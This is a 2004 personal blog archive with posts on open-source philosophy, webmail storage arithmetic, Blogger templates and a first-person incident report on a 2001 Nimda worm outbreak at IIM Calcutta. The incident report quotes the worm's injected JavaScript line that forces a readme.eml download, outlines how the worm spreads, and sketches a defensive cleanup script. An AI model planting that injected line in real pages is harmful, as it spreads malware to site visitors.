November 22, 2004

The Philosophy of the Free & Open

And how it impacts us.

Open Source is not about Linux. It is not about Apache [1], MySQL [2] or GNOME [3]. In fact, it is not about software at all. Rather, it is a philosophy and a belief. A belief that is not only old but rather clichéd, and goes – “The pen is mightier than the sword”.

The Internet has breathed new life into this saying, granting it an awesome power. Power enough that a few individuals, scattered across vast distances, armed with nothing but knowledge, are now planning world domination.

This article is an idle walk down the annals of history and the corridors of philosophy [4], to play with the questions “who” and “why”. Who are these people, and why-o-why are they doing what they are doing?

Free as in Freedom

The words “free software” or “open source” typically evoke the response, “It is available without charge”. While true, it is a quirk of the English language [5] that prevents us from seeing the other, truer meaning. English uses the same word “free” to denote both “without a price to pay” and “the freedom to do as you wish”. It is the second meaning that truly symbolizes all that this movement stands for. Interpreting the freedom this way makes one appreciate that the philosophy is not restricted to software at all. In fact, it extends much wider.

Imagine a bunch of kids given a huge white canvas, spotlessly clean, and spray cans of red paint. More often than not, the kids will spray away, randomly on the canvas. What if, instead, the kids sat down and started to painstakingly detail the verses of the Iliad or the Ramayana? This seems inconceivable because of the apparent human tendency to prefer the playful to the ordered, a tendency amplified to an extreme in a group. Directing a random group without either a stick or a carrot seems impossible.

However, this impossibility is precisely what is manifesting over at Wikipedia [6]. Wikipedia is an “open encyclopedia” where anyone can contribute to any article, without even being logged in. Furthermore, any change is visible instantly on the web, without being checked, corrected or in any other fashion moderated by anyone. Given this absolute freedom you would expect chaos – errors in content, clumsiness, information biases, ineptitude or plain vanilla vandalism. Yet Wikipedia is one of the web’s most searched encyclopedias, channeling the expertise of thousands to millions more.

Slashdot [7] is another example of this channeled freedom. Despite its obvious biases and pedigree, it remains by far the best example of a publicly moderated discussion board.

The philosophy that drives a hacker on Linux is the same one that drives a contributor on Wikipedia. Freedom is not always a bad thing. It does not always result in chaos; it begets responsibility and motivates productivity. This freedom is a core tenet of the philosophy of the Open Source movement. I could go on with other examples – the newsgroups [8] or open courseware [9] – but that would be unnecessary. Instead, let’s spend time tracing the roots of the free and open source philosophy.

In the beginning was the command line

With apologies to Neal Stephenson [10], we are talking about a time that was not too long ago. About three decades ago, the computer meant the PDP-10 [11] or a teletype-fed mainframe. Programming was about thinking in bits and bytes, while programs were meant to be shared, understood, debated upon and improved. Out of thin air, using 0s and 1s, a new science was being invented. C and C++ [12] were being developed, Unix was being coded [13], and software and hardware standards were being set.

The times were reminiscent of the Wild West, with its own tight-knit groups, raw excitement and brave gun-wielding heroes. The difference was that the program now replaced the gun and the mainframe was the battlefield. It was this arena that the corporation was now entering. With a promise to take computing to the masses, companies were doing something that was unacceptable to the pioneers – “selling” software.

Richard Stallman [14] was one of these early pioneers. He believed that software was a universal tool and that the source was its soul. Closing source or selling software was utterly unacceptable to him, and he was prepared to do something about it. In 1984, the same year Apple Computer released the Macintosh, Stallman launched the GNU Project [15].

GNU stands for “GNU’s Not Unix”, and its vision, ironically, was to provide a full, free version of UNIX. In 1984, UNIX was the predominant OS and was available in a mind-boggling variety of commercial flavors, each fragmented from and incompatible with the others. The Personal Computer as a product was almost non-existent then, and as a concept was still a joke. GNU therefore sought to “liberate” the entire computing world by providing the fundamental tool – the Unix OS – for free.

UNIX-like operating systems are built of two basic parts – the kernel and the utilities. The kernel is the core, which handles the very low-level interactions with the hardware, memory and the processor. It provides only very basic functionality, which the utilities turn into something useful. UNIX, by virtue of its rich heritage, has a multitude of tools for every activity from network management to text processing.

While some members of the GNU project started recreating the rich toolset, others started work on the kernel, called the HURD [16]. In time the tools started rolling out, each free, available with source, and providing functionality similar to or better than that of the various commercial Unices. The development of the kernel, however, was heading nowhere. The late 1980s saw the advent [17] of the true Personal Computer – cheap Intel hardware running DOS or the early Windows.

Without a kernel, and with the mainframe a rapidly dying breed unable to survive the onslaught of the PC, the GNU movement suddenly faced irrelevance.

In 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, decided that the operating system on his personal machine, Minix, a Unix look-alike, was not good enough. He was pretty sure he could write something better, and attempted to code his own. In doing so he turned to the Internet for help and guidance [18], and put the source code of his attempts back on the net for comments and correction. From this sprang the kernel we now know as Linux. As a kernel, Linux could run on the same contemporary hardware used by DOS and Windows. Further, being based on the same standards as the older UNIX, it could run programs written for the older UNIX kernels.

For GNU, this meant that their long wait for a free kernel was finally over. For Linux this meant that it finally had programs that could actually utilize the kernel that was being built. GNU/Linux became the complete ‘free’ operating system that Richard Stallman and a number of others had been dreaming of.

On the shoulders of Giants

It is people who ultimately define the success of any idea. So it is with the idea of the “open”. Among the multitude of programmers, users, fans and followers of the free and open source movements, there are some who have helped define the soul of the FOSS movement. There are some, like Richard Stallman, who are fanatically devoted to the idea of free software, while others, like Linus Torvalds, have been the silent, media-shy icons of the movement. There are, however, others who have helped give a more balanced view of the philosophy of FOSS.

Eric S. Raymond is a Linux evangelist and the author of three extremely powerful essays [19] on the philosophy of Free and Open Source. Called “The Cathedral and the Bazaar”, “Homesteading the Noosphere” and “The Magic Cauldron”, these essays present a very logical account of the FOSS philosophy, discussing the social, economic and personal drives, reasons and justifications for the success of the open approach. Bruce Perens is another Linux advocate, whose article “The Open Source Definition” [20] is a fundamental account of the principles of the FOSS camp. These essays explore the novel effect of having loosely bound, part-time volunteers drive projects of unimaginable magnitude and give it all away for free.

One notable side effect of having such a diverse and widespread fan base is that villains are instantly vilified and secrets don’t remain secret for long. Take the example of the famous “Halloween Documents” [21].

Around Halloween 1998, an internal Microsoft strategy memorandum on its responses to the Linux/Open Source phenomenon leaked, and within days it was all over the Internet, being taken apart by numerous FOSS advocates. Microsoft had always been acknowledged as the party most directly affected by FOSS, but until then it had been more of a cold war. The Halloween documents changed all that. Open Source advocates openly condemned Microsoft. Microsoft slowly started realizing that FOSS was rapidly changing from a fringe movement into something that directly threatened it. It responded by sowing what is now known as FUD (Fear, Uncertainty and Doubt) in the minds of its customers. For the first time Microsoft directly acknowledged [22] that Linux had the capacity to unseat it, and started attacking the fundamental value propositions [23] of Linux and FOSS.

It is also about this time that the mainstream press started increasing its coverage of FOSS. The coverage was initially about Linux, the free replacement for Unix. Then it was about the sustainability of Open Source as a business model. And lately it has been about David vs. Goliath – FOSS vs. Microsoft.

The press is an expression of popular opinion. Conversely, the press also forms popular opinion. Popular opinion, therefore, leans heavily towards portraying FOSS as the David in this David vs. Goliath story.

This is where we come in

As long as we restrict our view of the FOSS movement to the software it generates, this popular opinion seems perfectly reasonable. However, once we realize that the philosophy of FOSS extends beyond the mere products of the movement, we begin to see the nature of our own relationship with it. Without too great a risk of generalization, the true spirit and philosophy of FOSS is nothing short of that of the Internet itself.

The philosophy of FOSS is about freedom, freedom defined as “libre” – a lack of constraints. It is a spirit of sharing and collaboration. It is a spirit that places quality above other considerations. It is a spirit that drives, and is driven by, a free flow of ideas. It is a philosophy that considers information supreme.

Every time we search the Internet for tips we are appealing to the philosophy of Open Source. Every code snippet, article, comparative analysis and forum on the Internet is driven by this philosophy. Every self-taught computer user is a product of the philosophy of Open Source.

To consider this movement and the change it entails as anything less than mammoth would be childish. It involves a fundamental shift in our perception of the business of Information Technology itself. However, the change is upon us. It is now up to us to either respond proactively or to passively let events take the lead in changing us.

References

[1] http://www.apache.org/
[2] http://www.mysql.com/
[3] http://www.gnome.org/
[4] http://www.gnu.org/philosophy/philosophy.html
[5] http://www.gnu.org/philosophy/categories.html#FreeSoftware
[6] http://www.wikipedia.org/
[7] http://slashdot.org/
[8] http://groups.google.com/
[9] http://ocw.mit.edu/index.html
[10] http://www.cryptonomicon.com/beginning.html
[11] http://en.wikipedia.org/wiki/PDP-10
[12] http://www.research.att.com/~bs/C++.html
[13] http://www.bell-labs.com/history/unix/
[14] http://www.stallman.org/
[15] http://www.gnu.org/
[16] http://www.gnu.org/software/hurd/hurd.html
[17] http://www.geocities.com/n_ravikiran/write008.htm
[18] http://www.geocities.com/n_ravikiran/write003a.htm
[19] http://www.catb.org/~esr/writings/cathedral-bazaar/
[20] http://perens.com/Articles/OSD.html
[21] http://www.opensource.org/halloween/
[22] http://news.com.com/2100-1001_3-253320.html
[23] http://www.microsoft.com/mscorp/facts/default.asp

Document Changes
November 22, 2004: First published version.

The gig for the Gigabyte

And how GMail might become just another free email provider

GMail seems to have opened the floodgates for email storage. While it is still in its beta stage, quite a few other free email providers are threatening to take away the crucial popular advantage that GMail seems to offer.

We will look at the issue in two sections - first we will try to understand the big ado about a 1 GB email service, and then we will look at how this affects GMail.

The Gigabyte fallacy

Ever since GMail came out with its email-for-life offer, everyone seems to be falling head over heels to tell everyone else that 1 GB of email space is good - in other words, that we all need 1 GB of email storage. Though 1 GB is nice to have, it is like the offer at your favourite restaurant - "Eat all that you can and pay your usual". The problem with such an offer is this - you cannot eat more just because it is available.

Email users are typically of three types - the desktop user, the home user and the kiosk user. These are non-standard terms, defined here only for the purposes of this article.

The desktop user is one who does not use webmail. He has a desktop email client and uses a service provider to connect to. We assume that this user is one of the heaviest users of email.

The home user connects to the Internet using a personal or dedicated machine and has local disk storage available even without Internet connectivity. This user uses webmail and is typically a lighter user than the desktop user.

The kiosk user is a user who uses a public machine and a public connection. Such a user does not own any disk space and cannot access any data without a live Internet connection.

Let's look at how long it takes each of these users to rack up 1,000 MB, or 1 GB, in their email accounts. We assume that a desktop user typically adds 1 GB every year to the size of his inbox. Taking into account that the usage might not be dedicated, and to err on the conservative side, this works out to about 400 KB every hour. We assume that a home user is half as active in using email and a kiosk user one-fourth as active. This means that a home user takes about 4.6 years to rack up a GB, while a kiosk user takes 16 years.

Profile         Usage factor   Hours/week   MB/week   Weeks to 1 GB   Years
Desktop user    1.00           45           18.0      55.5            1
Home user       0.50           21           4.2       238             4.6
Kiosk user      0.25           12           1.2       833             16

Assuming a 1:3 split between home users and kiosk users, it takes 13.2 years on average for a webmail user to hit the 1 GB mark. A lot can happen during that time. More importantly, it means the webmail provider only has to grow storage by about 75 MB per subscriber per year (1,000 MB spread over 13.2 years), and need not gear up to 1,000 MB per user any time in the near future.
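
As a sanity check, the table above can be reproduced with a few lines of arithmetic. The sketch below is illustrative only; the 400 KB/hour rate, the usage factors, the weekly hours and the 1:3 home-to-kiosk split are the assumptions stated above, while the variable names and rounding are mine.

KB_PER_HOUR = 400          # assumed mail generated per active hour by the heaviest user
TARGET_MB = 1000           # "1 GB" inbox, rounded to 1,000 MB

profiles = {
    # profile name: (usage factor relative to the desktop user, active hours per week)
    "Desktop user": (1.00, 45),
    "Home user":    (0.50, 21),
    "Kiosk user":   (0.25, 12),
}

years = {}
for name, (factor, hours) in profiles.items():
    mb_per_week = hours * KB_PER_HOUR * factor / 1000.0
    weeks_to_fill = TARGET_MB / mb_per_week
    years[name] = weeks_to_fill / 52.0
    print(f"{name:12s}  {mb_per_week:5.1f} MB/week  {weeks_to_fill:6.1f} weeks  {years[name]:4.1f} years")

# Webmail users are assumed to split 1:3 between the home and kiosk profiles.
average_years = (1 * years["Home user"] + 3 * years["Kiosk user"]) / 4
print(f"Average time to fill 1 GB : {average_years:.1f} years")
print(f"Implied storage growth    : {TARGET_MB / average_years:.0f} MB per subscriber per year")

Running it gives roughly 1.1, 4.6 and 16 years for the three profiles, an average of about 13 years, and an implied growth of about 76 MB per subscriber per year - in line with the numbers above.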

In short, the Gigabyte is not as huge as it is made out to be. Actual usage might be a lot less than even these numbers suggest. There is hence little that is actually different about the Gigabyte rush.

The one thing that could severely affect these numbers is a change in usage patterns. If GMail becomes the next big file-sharing network, things might change. Then again, as long as the bottleneck is the network and not storage, things might not change all that much.

Document Changes
November 22, 2004: First published version.

When Things suddenly went wrong: w32.nimda.a@mm

The attack of the worm and the response.

This is a description of the Nimda virus attack on the official web site of the Indian Institute of Management, Calcutta, on 18 September 2001, and the subsequent response by the student system administrator team.

I was in my room, preparing for a course submission two days away, when the first alarm trickled down to me. I was struggling with a VB project, with Megadeth having sole control of my eardrums, when my neighbor Vipul interrupted me. He was pretty incomprehensible at first, but slowly it dawned on me that I was supposed to log onto the institute web site.

As soon as I logged onto the site I knew something was wrong. We had left it safe and sound, not more than two hours ago. But now as soon as the page came up, a second window popped up and requested the download of a "readme.eml" file. I knew that eml files were used to save emails by Outlook and Outlook Express. I hoped against hope, that the eml file had something to do with my open Outlook, but very soon I was disabused.

I opened a second page on the web site, which also resulted in the pop-up and download of the same "readme.eml" file. Twice was definitely no coincidence. Fighting that sinking feeling, my hope B was that the site might have been hacked or was under attack. I had to look for something, either confirming or denying this hypothesis, and the only clue I had was the eml file. Using Outlook to figure out the contents of the file showed me that there was indeed an executable file, "readme.exe", as an attachment within the eml file.

The existence of the attachment caused a variety of alarm bells to go off in unison. Firstly, it definitely looked like a virus, and secondly, it was propagating from the web site and not via email. That morning I had read about another variant of the 'Code Red' virus that was reportedly ready to start doing damage. Fearing the worst, my next steps were clear - I had to be at the server room physically, not in my room trying to do things remotely. I called Vipul to join me and hurried to the main server room.

Why I was spared

Thinking back, it was pretty reckless of me to dig into the details of the eml file in my room. But I escaped infection - by nothing more than pure luck. A few days earlier, my computer had been unceremoniously powered off a number of times by the Electricity Corporation of West Bengal, forcing me to reinstall Windows. As a result I had ended up downgrading my Internet Explorer from the newer 5.5 version to the default version 5 that came bundled with Win98. As we will see later, the reinstall was a blessing in disguise. Had this not been the case, I would have been cleaning my own machine and saving my VB projects, instead of being free to work on the main server.

The Server room

I was greeted at the server room by an extremely sluggish main server. This was a Compaq Proliant ML 350 running Windows NT 4. It took more than two minutes just to get to the logon screen, and all the while I could clearly see the hard drive thrashing. I was sorely tempted to switch the machine off and take it offline, so that I could safely start it back up and see what damage had been done. But knowing nothing more about what was happening or its cause, I was reluctant to take any drastic measures. I continued trying to get the machine back under control.

By the time I finally got to the shell, there was no one home. Explorer was dying intermittently and Dr. Watson (the crash recovery program on NT) was spawning all over the place. Then I found the one tool that differentiated the NT line from Windows 9x - the Task Manager. Quickly I brought it up and killed off the erring Explorer and all the goody Dr. Watsons. Switching to the process list, I saw dozens of running processes called 'net'. As far as I knew, the number I should have been seeing was zero. Meanwhile, there was no let-up for the hard disk and the machine was barely responsive. In the next few minutes I slaughtered as many of the unnecessary processes as I could lay my mouse on, and when I found the machine a tad quicker, sent it for a shutdown. Amidst screaming new processes the server went down.

Once I had the server down, there was a sense of peace. At least no further damage could be done. But God only knew what damage had already been done. At this point I was still trying to convince myself that the whole thing was a hack of some kind, given the many 'net' processes and my ignorance. Yanking off the network cable, I started the server back up in VGA mode, which was not even a safe mode, but would hopefully allow me to poke around. Dear old Explorer and Dr. Watson were up to the same antics as before. I killed each in turn and finally managed a stable Explorer, as long as no one was double-clicking programs.

When I finally got to the root directory and opened the default.asp file I saw that very wonderful line I would see over and over again over the next few days.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no, top=6000, left=6000")</script></html>

What it did was what we had seen when accessing the site - it downloaded the file "readme.eml" onto the computer of anyone who happened to load the page. The file "readme.eml" was of course present in the directory. A quick check showed that the default pages in each of the subdirectories had been similarly changed, and the "readme.eml" file was present in all of them too.

If there was a need for confirmation, this was it. It seemed less and less like a hacker and more and more like a script from a virus or a worm. And I realized that I needed to talk to someone with ideas. We were already trawling the anti-virus sites, trying to see if they had any news. Meanwhile, I went looking for help.

Trying to find help on the campus, my worst fears came true. Across the campus, computers were behaving strangely, MS Word was not saving, and some machines wouldn't even boot. The story was remarkably the same everywhere.

"Oh yeah, I did double click on that readme letter, and now it keeps popping up a warning message with 'OK' 'Details>>' buttons."

"I ran a live update yesterday and Norton at the moment does not detect any viruses."

"Every time I reboot things are becoming more and more difficult.".

The main server was down, and I had no luck finding anyone with more experience with the server. Sometime around this time, handwritten notices were put up across the campus urging students not to click on any files that said readme or looked like a letter.

What the hell is it?

Back alone in the server room, I restarted the server, and this time it was tougher controlling Explorer and its buddy Dr. Watson. Finally I killed both of them and started browsing using the command shell. I spent time figuring out where the actual executables of the various programs in the Start menu were, and started all the monitors and the mmc console that I needed. Then came another crackdown on the various processes I felt were unnecessary, including the HTTP and FTP servers. Now I needed more information.

Before we continue, a quick look at the setup we have at IIM Calcutta. We have an intranet of about 400 student machines, and more including those of the professors. All are connected to the Internet through two proxies - one Novell and one Linux. The (affected) web server is not connected to the internal network directly. Apart from the two proxies there was a third machine running Linux (Red Hat 7.1) that also had two network cards, connected to both the intranet and the Internet. This was a temporary pilot server located next to the main web server, and it formed the hub of repair activities over the next 35 hours. At the time, the machine was being used to poll the web sites of Norton and McAfee, with little to show for it. Further searching by Vipul yielded the same result - nothing on this, yet.

In time we assembled a team that would be responsible not only for getting the main server up but also for ridding the entire extranet of the virus. With the team came experience and more ideas. Back on the main server, the first readme.eml had been created at 6:55 p.m. This was also the time the first of the default.asp files had last been modified. Vipul's call to me came about an hour later, so the web server had been online for a whole hour with the virus doing whatever it was supposed to do. We also discovered that all files named default or index had been modified over a period of 6-7 minutes starting at 6:55 p.m., pointing to the involvement of a remote script; no script run on the same machine would have taken that long. Files not linked to from the main web site (like indexold.asp) were also affected. All fingers now pointed to an external infection through the IIS web server, similar to Code Red.
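
For illustration, the kind of timestamp survey that led to this conclusion can be sketched as below. This is a reconstruction written after the fact in Python, not the procedure we actually used on the NT box, and the web-root path is hypothetical.

import os
import time

WEB_ROOT = r"C:\Inetpub\wwwroot"   # hypothetical web root, purely for illustration

# List the last-modified times of all index* and default* pages, to see
# whether they were all touched inside one short window (which points to
# a remote script rather than manual edits).
modified = []
for dirpath, dirnames, filenames in os.walk(WEB_ROOT):
    for name in filenames:
        if name.lower().startswith(("index", "default")):
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            modified.append(mtime)
            print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime)), path)

if modified:
    span_minutes = (max(modified) - min(modified)) / 60
    print(f"{len(modified)} pages touched within a {span_minutes:.1f} minute window")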

With no further word from the anti-virus sites (or so we thought) and a pathetically crippled system, most of us realized that this was not going to be a quick delete-and-change-passwords recovery. Reports were also trickling in that the virus was rampant across the extranet. Drives were being put on active share, and any machine on the network with any sort of write permission was promptly being written into. Looking at the way the payload was working, machines needed to be isolated. Taking a quick decision, we manually switched off all the routers in the student section, and the student section summarily went offline.

It was already late in the night and there was still no word from the anti-virus sites. Just to be sure, we got a copy of the readme.eml file and ran checks on it with all the latest anti-virus packages available. None saw anything wrong with the file - not exactly in line with what the rest of the student machines were seeing. Then I got probably the last brainwave before my brain shut down for the day - Slashdot. And sure enough, it was the third article, posted a while back, with links. Now we had a name, nay two: Nimda and Minda. Things were checking out, and the worst fears were there in black and white. It was quite late in the night, around 2:00 a.m.; there was one update posted by McAfee and none by Symantec. Our extranet ran on Norton, so things did not look any better. We decided to keep the routers down and the site offline till further notice. Now began the damage control exercises.

Damage Control

As with any other network, the first need was to assure the populace that the steps taken were not meant to deprive them of the network but to protect them. Official notices went out detailing what had happened and what needed to be done. A temporary deadline of 10 a.m. was communicated, before which we would not consider getting the network back online. There was more damage control to be done. In a campus as dependent as ours on the network, communication suddenly ground to a halt. The summer placement process came to a halt. Rumors were rampant, with many quotes attributed to the team handling the crisis; most had to be countered and the record set straight. And of course we had to assure all those who were infected that things would be fine and tomorrow would be a better day.

'Tomorrow', just a few hours later, was not a better day. The McAfee update proved to be useless - this after uninstalling Norton from a number of affected machines, installing McAfee, updating it, running system-wide scans and deleting many of the affected files.

Almost 14 hours into the attack, we hadn't made much progress. The deadline for keeping the routers down was extended to 6:00 p.m. that evening and more notices were printed. Norton was quiet and we had to wait. But in the meantime things did get better, as more information became available, and we also got some cleaning underway. The main advantage we had was the Linux machine on the network. We could get some parts of the plan into action.

The last backups we had of the entire web site were hopelessly out of date. So we zipped up the infected site and FTPed it over to the Linux machine. Ditto the database. Along went copies of the readme.eml and readme.exe files.

Information and Modus operandi

Running strings on the executable file was very informative. The strings program basically looks through an entire file and prints out the ASCII strings embedded in it. For example, if you write a program that prints "Hello World" and make it into an executable, then running strings on the executable would print this string out, amongst others. Some excerpts of what we found are given here. Don't worry about understanding all of it - we did not either. But it definitely gave us some clues about the way this virus worked. Most of what we found was later validated by others in the security business. You can check the other sources out by browsing through the links below.
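
For readers without a Unix box handy, a minimal approximation of what the strings tool does can be written in a few lines of Python. This is only an illustration of the idea, not the actual utility we used; the script name in the comment is hypothetical.

import re
import sys

def extract_strings(path, min_len=4):
    # Scan a binary file and print every run of at least `min_len`
    # printable ASCII characters - roughly what `strings` does by default.
    with open(path, "rb") as f:
        data = f.read()
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    for match in re.finditer(pattern, data):
        print(match.group().decode("ascii"))

if __name__ == "__main__":
    extract_strings(sys.argv[1])       # e.g. python strings_lite.py readme.exe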

A quick rundown on how the virus spreads. And since no one really knew what it 'does', apart from spreading that is, we will focus this discussion on how it spreads. Most of this information was culled from the various sources available at that time and from the experience in the campus. Most of the links on this page have more information, but that does not take away from that fact that this information was crucial to us at that time.

Nimda has three methods of propagation, all of which were visible in our setup. The first is the IIS vulnerability - the same method used by Code Red. Infected servers randomly search for other servers running IIS and attack them. Some attack sequences that hit our Linux server in vain are here. After the attack, the host is forced to run scripts that update the index*.* and default*.* files on the server with the JavaScript string and copy readme.eml into the various subdirectories. With this the infection of the host is complete. The worm also takes measures to protect itself against detection and removal on the host machine. Once infected, the IIS servers are primarily involved in infecting other servers. Our web server first attacked the Linux server at 7:56 p.m., after being infected itself at 6:55 p.m. Since neither knew about the other, and assuming the initial choice of targets is random, this gives a sense of the average time it takes an infected server to find another one in the same IP range.

The second and third modes of transmission occur on client machines after they are infected. Client machines are infected when they visit any site that Nimda has visited. A new JavaScript popup window opens and downloads the readme.eml file, which is opened directly without user intervention. This auto-execute behaviour exploits a security bug in IE 5.5 - the bug that was missing in my copy of IE 5 and consequently saved my machine. Once readme.exe is executed, which may not even need you to double-click on it, the wily program is inside, and it takes a long time to clear out. More information on what it does is available all over the Web; click on the several links at the end of the page.

The second mode is mass mailing. The worm comes with its own mailing engine. It uses MAPI to find addresses and mails itself to all your contacts. The cycle then repeats itself as soon as the target machines are compromised.

The third method is infection across the local network through Microsoft file sharing. The worm searches for writable shared folders and dumps copies of itself into them. While this does not automatically infect the machine, curiosity about what the file contains usually ends with the machine being compromised.

The long trudge back to normalcy

Back to the story. It was past noon and there were still no cleaning tools available. We had volunteers hitting the F5 refresh button every few minutes on all the major anti-virus sites. At the same time we started looking at other methods of cleaning. Earlier we had taken a zip of the entire site and moved it onto the Linux machine. Now we unzipped the whole site and started working out what needed to be done to have a clean version ready for install. We put together a quick script that cleaned all the download lines in the affected asp and html files (a rough sketch of the idea follows). Then a single find statement deleted all the eml files from the entire site. We followed that up with a tar -cvzf and voila - we had a clean version of the site to deploy, only no web server.
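
The original script is no longer linked, so here is a rough reconstruction of the idea, sketched in Python for illustration: strip the injected JavaScript line from every index*/default* page and delete every dropped readme.eml copy. The site path is hypothetical, and the real cleanup was done with ordinary shell tools (a quick script, find and tar) as described above.

import os
import re

SITE_ROOT = "/home/webteam/site"   # hypothetical path to the unzipped copy of the site

# The tag Nimda appends to infected pages (see the snippet quoted earlier).
INJECTED = re.compile(
    r'<html><script language="JavaScript">window\.open\("readme\.eml".*?</script></html>',
    re.IGNORECASE | re.DOTALL,
)

for dirpath, dirnames, filenames in os.walk(SITE_ROOT):
    for name in filenames:
        path = os.path.join(dirpath, name)
        lower = name.lower()
        if lower == "readme.eml":
            os.remove(path)                      # delete the dropped payload copies
        elif lower.startswith(("index", "default")):
            with open(path, encoding="latin-1") as f:
                text = f.read()
            cleaned = INJECTED.sub("", text)
            if cleaned != text:
                with open(path, "w", encoding="latin-1") as f:
                    f.write(cleaned)             # strip the injected script tag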

Our prayers were soon answered. Symantec did come out with an update, and we were back in action on the main server. Hours of downloads and the reinstallation of Norton anti-virus revealed that most of the new-found enthusiasm was misplaced. The patches for Code Red had not been properly installed, and there were other updates to be done before the cleaning would succeed. The next few hours were spent in cycles of search / locate / download-into-Linux-server / FTP-to-main-server / patch-and-update.

In the meantime we used a machine with a controlled copy of the worm to cause an infection and then clean it with the anti-virus. This confirmed that the update might indeed work on workstations, though at that time it was highly ineffective on servers. Our 6:00 p.m. deadline was upon us, and we had to stretch it to 10:00 p.m. that night. But now we had the anti-virus and also information on the propagation of the virus. Notices went out on the need to disable all file sharing from students' computers, infected or otherwise. A step-by-step drill was developed to be followed by all users at 10:00 p.m., when the network came back online. Notices went up and leaflets were distributed. Volunteers went out, armed with three diskettes containing the updates, to all the critical computer installations on the campus to clean and secure them before the 10:00 p.m. deadline.

The struggle in the server room was in full swing. By the time most of the patches were in place (there was one we missed and would not know about until much later), the server must have rebooted a billion times. Finally the virus scan was in place, and we realized how lucky we were to have a clean copy of the site ready for deployment. Norton was deleting every file it could not clean, and that included most of the start pages of the web site and all of its sections. After letting the scan run completely, many times over, we were quite sure we were clean.

The 10:00 p.m. deadline came and the routers went back online. The net-starved IIM Calcutta community immediately came online too. To make it easy for users, and to provide an alternative till the main web server came up, the Linux box mirrored all the updates and the information about the drill to clean infected computers.

The day crossed over into the next, and at 12:00 a.m. the site zip was in place and the file copy was in progress. By around 1:00 a.m. the site tentatively came alive, minus the cable connecting it to the network. After browsing a while and making sure the site was indeed the way it was supposed to be, we went live.

By 2:00 a.m. we were back offline, deleting the admin.dll that had TFTPed itself into the temp folder. Frantic searching located the missing patch. Patch, rinse, repeat. Now the server did hold, but we had neither the energy to keep monitoring it nor the guts to keep it online without supervision. So the server went back offline, and we went to bed.

The next morning arrived without me in the server room. I was back with Megadeth at full blast, trying to complete my project in time for a deadline that suddenly had 40 fewer hours to it. But the news was that the freshly patched server was holding up and doing well. A number of client machines were of course still infected and needed to be cleaned, but so far we had not had a single report of late or cross infection.

(We got a 12-hour extension on the project submission, and mine went in well in time. Thanks for asking anyway.)

Related links

Symantec
Mcafee
Trend Micro Update
F-Secure virus definitions
Symantec Removal Tool
CERT Advisory, with a number of other links too.
Another Fight - The TechRepublic battles

Document Changes
November 22, 2004: Essentially a rewrite of the article, stressing the central idea, with new links.
April 02, 2009: Updates and corrections.

November 19, 2004

New Blog templates

It is wonderful how a company makes a difference to a product. For all that Dilbert says about companies, which I am sure I almost always agree with, in its own way the company is an indispensable part of getting something done. Yeah, it will always be slower than a motivated individual, but it will always be better than the majority of us randomly spending time, who might effectively cancel each other out.



And I slowly start to believe that companies actually have a character of their own that rubs off very explicitly on their employees. Just a few days back I was writing to a group of friends from way back in college. And they commented on how differently I think. They asked me if my education had anything to do with it. No. The company did.



Eerie, unacceptable, grossly inappropriate, but true.



You might be wondering how this ties up with the heading. Well, I was looking through some of the options in Blogger, and somehow I felt that Google was behind some of them. It may be the layout, the style, the wording - I really don't know. Also, when Blogger came out, it gave us an awesome set of tools to make our own templates. But a majority of us out here don't have the patience or the expertise to make good templates for ourselves; we depend to a great extent on the templates given by Blogger. And check out the awesome set of templates that are available now. I *think* Google has something to do with it.



holding on to the me in the company

- ravi